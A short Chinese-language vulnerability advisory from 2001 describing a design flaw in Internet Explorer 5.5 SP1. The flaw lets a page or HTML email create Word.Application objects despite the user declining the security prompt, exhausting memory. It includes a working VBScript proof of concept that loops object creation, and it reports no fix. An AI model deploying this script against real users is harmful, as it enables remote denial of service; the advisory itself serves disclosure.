IE存在另一个拒绝服务攻击发布时间:2001-04-25 更新时间:2001-04-25 严重程度:中 威胁程度:远程拒绝服务 错误类型:设计错误 利用方式:客户机模式 受影响系统 Internet Explorer 5.5 with SP1详细描述 一个安全漏洞可以使IE去建立多个WORD OBJECT,当执行含有建立WORD OBJECT时候不管IE提出警告信息而且用户也回答"No"都会导致OBJECT建立。 这样就可能导致内存的耗竭,远程用户可以通过HTML EMAIL形式攻击。 下面的例子中,IE在第一个循环中就会提出安全警告,但是无论你是否按 否不去执行,"word.application" object照样建立。注意:word.application object仅仅建立在内存中,而脚本是不会执行object中的代码的。 测试代码 //---------cut here--------------------------------- <HTML> <SCRIPT LANGUAGE="VbScript"> On Error Resume Next Dim a Dim i for i=1 to 100 Set a = CreateObject("Word.Application") Next </SCRIPT> </HTML> //---------end of cut--------------------------------- 解决方案 尚无 相关信息 eflorio at edmaster.it |
